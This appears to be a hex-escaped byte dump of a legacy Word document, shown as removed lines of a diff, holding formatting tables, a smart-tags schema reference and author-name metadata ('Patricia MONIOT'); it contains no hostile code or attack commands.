-"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01"
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
-"\x00\x98\x00\x00\x00\x00\x20\x01\x99\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00"
-"\x00\x00\x20\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x18\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x20\x00\x00"
-"\x00\x00\x80\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x20\x00\x00\x00\x00\x80\x01\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00"
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x98\x40\x00\x00\x16\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\xf8\x00\x00\x00\x00\x80\x07"
-"\x98\x40\x00\x00\x16\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x98\x40\x00\x00"
-"\x16\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00"
-"\x00\x70\x00\x00\x00\x00\x00\x00\x98\x40\x00\x00\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x07\x08\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xf4\x00\x00\x7b\xc0\x02\x02\x00\x00\x07"
-"\x00\x00\x00\x00\xe5\x6b\x00\x00\xe6\x6b\x00\x00\x15\x6c\x00\x00"
-"\x16\x6c\x00\x00\xbf\x6d\x00\x00\xc0\x6d\x00\x00\xfe\x6d\x00\x00"
-"\xff\x6d\x00\x00\x36\x6e\x00\x00\x37\x6e\x00\x00\x1b\x74\x00\x00"
-"\x4f\x39\x01\x30\x00\x30\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
-"\x01\x00\x00\x00\x8c\x0f\xae\x00\x20\x2c\x61\x07\x39\x00\x00\x00"
-"\x02\x30\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x64\x00\x00\x00"
-"\x02\x00\x00\x00\x23\x00\x20\x05\x4d\x39\x01\x30\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x8c\x0f\xae\x00"
-"\x20\x2c\x61\x07\x39\x00\x00\x00\x02\x30\x00\x00\x06\x00\x00\x00"
-"\x02\x00\x00\x00\x64\x00\x00\x00\x02\x00\x00\x00\x23\x00\x20\x05"
-"\x4f\x39\x01\x30\x00\x30\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
-"\x01\x00\x00\x00\x8c\x0f\xae\x00\x20\x2c\x61\x07\x39\x00\x00\x00"
-"\x02\x30\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x64\x00\x00\x00"
-"\x02\x00\x00\x00\x23\x00\x20\x05\x4f\x39\x01\x30\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x8c\x0f\xae\x00"
-"\x20\x2c\x61\x07\x39\x00\x00\x00\x02\x30\x00\x00\x06\x00\x00\x00"
-"\xa9\x00\x00\x00\x64\x00\x00\x00\x02\x00\x00\x00\x23\x00\x20\x05"
-"\x4f\x39\x01\x30\x06\x30\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
-"\x01\x00\x00\x00\x8c\x0f\xae\x00\xc8\x2c\x61\x07\x58\x00\x00\x00"
-"\x01\x30\x00\x00\x35\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00"
-"\x01\x00\x00\x00\x5b\x00\xa0\x05\x4f\x39\x01\x30\x00\x30\x00\x00"
-"\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
-"\x8c\x0f\xae\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x00\x00\x00"
-"\x39\x00\x00\x00\x39\x00\x00\x00\x3c\x00\x00\x00\x00\x06\x00\x00"
-"\xa4\x47\x00\x00\xb4\x5b\x00\x00\xe1\x6d\x00\x00\x0a\x76\x00\x00"
-"\xfd\x7b\x00\x00\x1a\x7c\x00\x00\x3f\x00\x00\x00\x48\x00\x00\x00"
-"\x4d\x00\x00\x00\x51\x00\x00\x00\x78\x00\x00\x00\x80\x00\x00\x00"
-"\x00\x06\x00\x00\x62\x0d\x00\x00\x7f\x1b\x00\x00\x40\x2b\x00\x00"
-"\x23\x34\x00\x00\x09\x40\x00\x00\x51\x43\x00\x00\xef\x4c\x00\x00"
-"\x87\x53\x00\x00\xfb\x58\x00\x00\xe7\x5b\x00\x00\xeb\x5e\x00\x00"
-"\x45\x64\x00\x00\xed\x68\x00\x00\xe2\x6d\x00\x00\x29\x6f\x00\x00"
-"\xaa\x6f\x00\x00\xdd\x6f\x00\x00\x11\x70\x00\x00\x3e\x70\x00\x00"
-"\x6e\x70\x00\x00\xa2\x70\x00\x00\xd9\x70\x00\x00\x05\x71\x00\x00"
-"\x31\x71\x00\x00\x5f\x71\x00\x00\x8c\x71\x00\x00\xbf\x71\x00\x00"
-"\xe4\x71\x00\x00\x07\x72\x00\x00\x3f\x72\x00\x00\x6c\x72\x00\x00"
-"\x9e\x72\x00\x00\xd4\x72\x00\x00\x03\x73\x00\x00\x31\x73\x00\x00"
-"\x55\x73\x00\x00\x80\x73\x00\x00\xaa\x73\x00\x00\xe5\x73\x00\x00"
-"\x11\x74\x00\x00\x40\x74\x00\x00\x66\x74\x00\x00\x87\x74\x00\x00"
-"\xb7\x74\x00\x00\xf0\x74\x00\x00\x20\x75\x00\x00\x54\x75\x00\x00"
-"\x7a\x75\x00\x00\x9d\x75\x00\x00\xc7\x75\x00\x00\x02\x76\x00\x00"
-"\x36\x76\x00\x00\x60\x76\x00\x00\x88\x76\x00\x00\xa9\x76\x00\x00"
-"\xd2\x76\x00\x00\x07\x77\x00\x00\x3d\x77\x00\x00\x1a\x7c\x00\x00"
-"\x40\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00"
-"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x49\x00\x00\x00"
-"\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00\x4e\x00\x00\x00"
-"\x4f\x00\x00\x00\x50\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00"
-"\x54\x00\x00\x00\x55\x00\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00"
-"\x58\x00\x00\x00\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00"
-"\x5c\x00\x00\x00\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00"
-"\x60\x00\x00\x00\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00"
-"\x64\x00\x00\x00\x65\x00\x00\x00\x66\x00\x00\x00\x67\x00\x00\x00"
-"\x68\x00\x00\x00\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00"
-"\x6c\x00\x00\x00\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00"
-"\x70\x00\x00\x00\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00"
-"\x74\x00\x00\x00\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00"
-"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00"
-"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x00\x06\x00\x00"
-"\x19\x7c\x00\x00\x41\x00\x00\x00\x16\x00\x00\x00\x1d\x00\x00\x00"
-"\x1f\x00\x00\x00\x3c\x00\x00\x00\x13\x21\xf4\xff\x95\x80\xff\xff"
-"\x23\x00\x00\x00\x06\x00\xd7\x43\x05\x00\x00\x00\x02\x00\x74\x0e"
-"\x29\x04\x06\x00\xd8\x43\x05\x00\x00\x00\x02\x00\xb4\x0e\x29\x04"
-"\x06\x00\xd9\x43\x05\x00\x00\x00\x02\x00\xf4\x0e\x29\x04\x06\x00"
-"\xda\x43\x05\x00\x00\x00\x02\x00\x7c\x09\x29\x04\x06\x00\xdb\x43"
-"\x05\x00\x00\x00\x02\x00\x6c\xee\x28\x04\x06\x00\xdc\x43\x05\x00"
-"\x00\x00\x02\x00\xac\xee\x28\x04\x06\x00\xdd\x43\x05\x00\x00\x00"
-"\x02\x00\x3c\xeb\x28\x04\x06\x00\xde\x43\x05\x00\x00\x00\x02\x00"
-"\x7c\xeb\x28\x04\x06\x00\xdf\x43\x05\x00\x00\x00\x02\x00\xbc\xeb"
-"\x28\x04\x06\x00\xe0\x43\x05\x00\x00\x00\x02\x00\x54\xe8\x28\x04"
-"\x06\x00\xe1\x43\x05\x00\x00\x00\x02\x00\x94\xe8\x28\x04\x06\x00"
-"\xe2\x43\x05\x00\x00\x00\x02\x00\xd4\xe8\x28\x04\x06\x00\xe3\x43"
-"\x05\x00\x00\x00\x02\x00\x8c\xdd\x28\x04\x06\x00\xe4\x43\x05\x00"
-"\x00\x00\x02\x00\xcc\xdd\x28\x04\x06\x00\xe5\x43\x05\x00\x00\x00"
-"\x02\x00\x0c\xde\x28\x04\x06\x00\xe6\x43\x05\x00\x00\x00\x02\x00"
-"\xcc\xda\x28\x04\x06\x00\xe7\x43\x05\x00\x00\x00\x02\x00\x0c\xdb"
-"\x28\x04\x06\x00\xe8\x43\x05\x00\x00\x00\x02\x00\x4c\xdb\x28\x04"
-"\x06\x00\xe9\x43\x05\x00\x00\x00\x02\x00\x8c\xd5\x28\x04\x06\x00"
-"\xea\x43\x05\x00\x00\x00\x02\x00\xcc\xd5\x28\x04\x06\x00\xeb\x43"
-"\x05\x00\x00\x00\x02\x00\x0c\xd6\x28\x04\x06\x00\xec\x43\x05\x00"
-"\x00\x00\x02\x00\xa4\xd2\x28\x04\x06\x00\xed\x43\x05\x00\x00\x00"
-"\x02\x00\xe4\xd2\x28\x04\x06\x00\xee\x43\x05\x00\x00\x00\x02\x00"
-"\x24\xd3\x28\x04\x06\x00\xef\x43\x05\x00\x00\x00\x02\x00\x7c\xcf"
-"\x28\x04\x06\x00\xf0\x43\x05\x00\x00\x00\x02\x00\xbc\xcf\x28\x04"
-"\x06\x00\xf1\x43\x05\x00\x00\x00\x02\x00\xfc\xcf\x28\x04\x06\x00"
-"\xf2\x43\x05\x00\x00\x00\x02\x00\x6c\xcc\x28\x04\x06\x00\xf3\x43"
-"\x05\x00\x00\x00\x02\x00\xac\xcc\x28\x04\x06\x00\xf4\x43\x05\x00"
-"\x00\x00\x02\x00\xec\xcc\x28\x04\x06\x00\xf5\x43\x05\x00\x00\x00"
-"\x02\x00\x84\xc9\x28\x04\x06\x00\xf6\x43\x05\x00\x00\x00\x02\x00"
-"\xc4\xc9\x28\x04\x06\x00\xf7\x43\x05\x00\x00\x00\x02\x00\x04\xca"
-"\x28\x04\x06\x00\xf8\x43\x05\x00\x00\x00\x02\x00\xe4\xc5\x28\x04"
-"\x06\x00\xf9\x43\x05\x00\x00\x00\x02\x00\x24\xc6\x28\x04\x25\x01"
-"\x00\x00\x55\x01\x00\x00\x04\x0d\x00\x00\x8e\x13\x00\x00\x68\x16"
-"\x00\x00\x5e\x17\x00\x00\x07\x18\x00\x00\x4f\x1e\x00\x00\x42\x20"
-"\x00\x00\xfb\x20\x00\x00\x74\x23\x00\x00\x2c\x26\x00\x00\x02\x52"
-"\x00\x00\x9d\x52\x00\x00\x00\x53\x00\x00\x7c\x53\x5e\x00\xae\x53"
-"\x00\x00\x2b\x54\x00\x00\x9f\x56\x00\x00\xc7\x56\x00\x00\xe6\x56"
-"\x00\x00\xa0\x57\x00\x00\xec\x57\x00\x00\x85\x5a\x00\x00\x90\x5a"
-"\x00\x00\x48\x5b\x00\x00\xff\x5c\x00\x00\xad\x67\x00\x00\xe0\x67"
-"\x00\x00\x15\x68\x00\x00\x4c\x68\x00\x00\x4f\x68\x00\x00\x20\x6b"
-"\x00\x00\x5c\x6d\x00\x00\x6d\x6f\x00\x00\x1b\x74\x00\x00\x00\x00"
-"\x00\x00\x01\x00\x01\x00\x00\x00\x01\x00\x02\x00\x00\x00\x01\x00"
-"\x03\x00\x00\x00\x01\x00\x04\x00\x00\x00\x01\x00\x05\x00\x00\x00"
-"\x01\x00\x06\x00\x00\x00\x01\x00\x07\x00\x00\x00\x01\x00\x08\x00"
-"\x00\x00\x01\x00\x09\x00\x00\x00\x01\x00\x0a\x00\x00\x00\x01\x00"
-"\x0b\x00\x00\x00\x01\x00\x0c\x00\x00\x00\x01\x00\x0d\x00\x00\x00"
-"\x01\x00\x0e\x00\x00\x00\x01\x00\x0f\x00\x00\x00\x01\x00\x10\x00"
-"\x00\x00\x01\x00\x11\x00\x00\x00\x01\x00\x12\x00\x00\x00\x01\x00"
-"\x13\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x15\x00\x00\x00"
-"\x01\x00\x16\x00\x00\x00\x01\x00\x17\x00\x00\x00\x01\x00\x18\x00"
-"\x00\x00\x01\x00\x19\x00\x00\x00\x01\x00\x1a\x00\x00\x00\x01\x00"
-"\x1b\x00\x00\x00\x01\x00\x1c\x00\x00\x00\x01\x00\x1d\x00\x00\x00"
-"\x01\x00\x1e\x00\x00\x00\x01\x00\x1f\x00\x00\x00\x01\x00\x20\x00"
-"\x00\x00\x01\x00\x21\x00\x00\x00\x01\x00\x22\x00\x00\x00\x01\x00"
-"\x2a\x01\x00\x00\x5a\x01\x00\x00\x09\x0d\x00\x00\x90\x13\x00\x00"
-"\x6a\x16\x00\x00\x60\x17\x00\x00\x09\x18\x00\x00\x51\x1e\x00\x00"
-"\x44\x20\x00\x00\xfd\x20\x00\x00\x76\x23\x00\x00\x2e\x26\x00\x00"
-"\x04\x52\x00\x00\x9f\x52\x00\x00\x02\x53\x00\x00\x7e\x53\x00\x00"
-"\xb0\x53\x00\x00\x2d\x54\x00\x00\xa1\x56\x00\x00\xc9\x56\x00\x00"
-"\xe8\x56\x00\x00\xa2\x57\x00\x00\xee\x57\x00\x00\x87\x5a\x00\x00"
-"\x92\x5a\x00\x00\x4a\x5b\x00\x00\x01\x5d\x00\x00\xaf\x67\x00\x00"
-"\xe2\x67\x00\x00\x17\x68\x00\x00\x4e\x68\x00\x00\x51\x68\x00\x00"
-"\x24\x6b\x00\x00\x61\x6d\x00\x00\x72\x6f\x00\x00\x1b\x74\x00\x00"
-"\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00"
-"\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00"
-"\x08\x00\x00\x00\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00"
-"\x0c\x00\x00\x00\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00"
-"\x10\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00"
-"\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00"
-"\x18\x00\x00\x00\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00"
-"\x1c\x00\x00\x00\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00"
-"\x20\x00\x00\x00\x21\x00\x00\x00\x22\x00\x00\x00\x01\x00\x00\x00"
-"\x3e\x00\x00\x00\x23\x00\x00\x00\x2a\x80\x75\x72\x6e\x3a\x73\x63"
-"\x68\x65\x6d\x61\x73\x2d\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2d"
-"\x63\x6f\x6d\x3a\x6f\x66\x66\x69\x63\x65\x3a\x73\x6d\x61\x72\x74"
-"\x74\x61\x67\x73\x0a\x80\x50\x65\x72\x73\x6f\x6e\x4e\x61\x6d\x65"
-"\x00\x80\x0c\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x23\x00"
-"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00"
-"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00"
-"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00"
-"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00"
-"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00"
-"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00"
-"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00"
-"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00"
-"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\xd3\x00\x00\x00\x23\x00"
-"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00"
-"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00"
-"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00"
-"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x54\x50\x00\x00\x5a\x50\x00\x00\xc3\x50\x00\x00"
-"\xc8\x50\x00\x00\xfd\x50\x00\x00\x05\x51\x00\x00\x55\x51\x00\x00"
-"\x5c\x51\x00\x00\xcd\x67\x00\x00\xd7\x67\x00\x00\x00\x68\x00\x00"
-"\x0c\x68\x00\x00\x1e\x68\x00\x00\x24\x68\x00\x00\x57\x68\x00\x00"
-"\x5e\x68\x00\x00\x6e\x68\x00\x00\x75\x68\x00\x00\x92\x68\x00\x00"
-"\x99\x68\x00\x00\xc3\x68\x00\x00\xd0\x68\x00\x00\xdd\x68\x00\x00"
-"\xe5\x68\x00\x00\x3c\x69\x00\x00\x45\x69\x00\x00\x8c\x69\x00\x00"
-"\x95\x69\x00\x00\xda\x69\x00\x00\xe3\x69\x00\x00\x47\x6a\x00\x00"
-"\x4d\x6a\x00\x00\xed\x6a\x00\x00\xf3\x6a\x00\x00\x03\x6b\x00\x00"
-"\x0a\x6b\x00\x00\x29\x6b\x00\x00\x30\x6b\x00\x00\x70\x6b\x00\x00"
-"\x77\x6b\x00\x00\xdc\x6b\x00\x00\xe0\x6b\x00\x00\x6e\x6c\x00\x00"
-"\x78\x6c\x00\x00\x8b\x6c\x00\x00\x91\x6c\x00\x00\xa5\x6c\x00\x00"
-"\xb2\x6c\x00\x00\xd6\x6c\x00\x00\xdd\x6c\x00\x00\xe0\x6c\x00\x00"
-"\xe6\x6c\x00\x00\x42\x6d\x00\x00\x4b\x6d\x00\x00\x4c\x6d\x00\x00"
-"\x53\x6d\x00\x00\x65\x6d\x00\x00\x6a\x6d\x00\x00\xac\x6d\x00\x00"
-"\xba\x6d\x00\x00\xf5\x6d\x00\x00\xf8\x6d\x00\x00\x28\x6e\x00\x00"
-"\x31\x6e\x00\x00\x43\x6e\x00\x00\x47\x6e\x00\x00\xb8\x6e\x00\x00"
-"\xc3\x6e\x00\x00\xfb\x6e\x00\x00\x02\x6f\x00\x00\x0e\x6f\x00\x00"
-"\x14\x6f\x00\x00\x2e\x6f\x00\x00\x3b\x6f\x00\x00\x74\x71\x00\x00"
-"\x7a\x71\x00\x00\x7d\x71\x00\x00\x84\x71\x00\x00\xdf\x73\x00\x00"
-"\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
-"\x07\x00\x04\x00\x07\x00\x07\x00\x02\x00\x00\x00\x00\x00\x80\x01"
-"\x00\x00\x83\x01\x00\x00\xda\x06\x00\x00\xdb\x06\x00\x00\xa2\x0d"
-"\x00\x00\xa4\x0d\x00\x00\x8e\x1b\x00\x00\x95\x1b\x00\x00\x1d\x25"
-"\x00\x00\x1f\x25\x00\x00\xf8\x2e\x00\x00\x1c\x2f\x00\x00\x58\x3c"
-"\x00\x00\x60\x3c\x00\x00\x10\x48\x00\x00\x19\x48\x00\x00\xdf\x73"
-"\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x33\x00\x07\x00"
-"\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00"
-"\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00\x07\x00\x02\x00"
-"\x00\x00\x00\x00\x1b\x4f\x00\x00\x32\x4f\x00\x00\x10\x50\x00\x00"
-"\x40\x50\x00\x00\x42\x50\x00\x00\x43\x50\x00\x00\xca\x50\x00\x00"
-"\xdd\x50\x00\x00\x42\x5d\x00\x00\x6f\x5d\x00\x00\x7b\x5e\x00\x00"
-"\x86\x5e\x00\x00\xa3\x5f\x00\x00\xb0\x5f\x00\x00\x81\x60\x00\x00"
-"\x8b\x60\x00\x00\xd4\x60\x00\x00\x07\x61\x00\x00\xa7\x67\x00\x00"
-"\x34\x68\x00\x00\x54\x68\x00\x00\x6e\x68\x00\x00\xa3\x68\x00\x00"
-"\xf3\x69\x00\x00\x13\x6a\x00\x00\x22\x6a\x00\x00\x44\x6a\x00\x00"
-"\x5d\x6a\x00\x00\x75\x6a\x00\x00\x6e\x6c\x00\x00\x7a\x6c\x00\x00"
-"\x7f\x6c\x00\x00\xf3\x6c\x00\x00\x77\x6e\x00\x00\x7f\x6e\x00\x00"
-"\x3e\x6f\x00\x00\xdf\x73\x00\x00\xf5\x73\x00\x00\xff\x73\x00\x00"
-"\x06\x74\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x05\x00"
-"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00"
-"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00"
-"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00"
-"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00"
-"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x02\x00"
-"\x00\x00\x00\x00\x7d\x71\x00\x00\x84\x71\x00\x00\xdf\x73\x00\x00"
-"\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x04\x00\x07\x00\x07\x00"
-"\x02\x00\xff\xff\x14\x00\x00\x00\x08\x00\x50\x00\x61\x00\x74\x00"
-"\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x00\x00\x08\x00\x50\x00"
-"\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x00\x00"
-"\x08\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00"
-"\x61\x00\x00\x00\x08\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00"
-"\x63\x00\x69\x00\x61\x00\x00\x00\x0f\x00\x50\x00\x61\x00\x74\x00"
-"\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00\x4d\x00\x4f\x00"
-"\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00\x50\x00\x61\x00"
-"\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00\x4d\x00"
-"\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00\x50\x00"
-"\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00"
-"\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00"
-"\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00"
-"\x20\x00\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00"
-"\x06\x00\x4d\x00\x6f\x00\x6e\x00\x69\x00\x6f\x00\x74\x00\x00\x00"
-"\x03\x00\x50\x00\x61\x00\x74\x00\x00\x00\x01\x00\xc9\x6e\x24\x4f"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x02\x00\x0a\x00"
-"\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00\xe5\x00\x00\x00\x00\x00"
-"\x00\x00\x09\x00\x00\x00\x55\x3b\x1b\x00\x1e\x3b\x1d\x00\x02\x75"
-"\x3b\x00\x45\x6d\x47\x00\xae\x0f\x6a\x00\xa5\x49\x73\x00\x2e\x20"
-"\xb9\x00\x52\x59\xd7\x00\x3e\x75\xec\x00\x25\x31\xed\x00\x00\x00"
-"\x00\x00\x15\x27\x00\x00\x90\x28\x00\x00\xef\x44\x00\x00\xde\x50"
-"\x00\x00\x4e\x5b\x00\x00\x4f\x5b\x00\x00\x45\x5c\x00\x00\x46\x5c"
-"\x00\x00\xf1\x5e\x00\x00\xfc\x5e\x00\x00\x36\x62\x00\x00\x41\x62"
-"\x00\x00\x2d\x66\x00\x00\x15\x67\x00\x00\xa6\x67\x00\x00\xa7\x67"
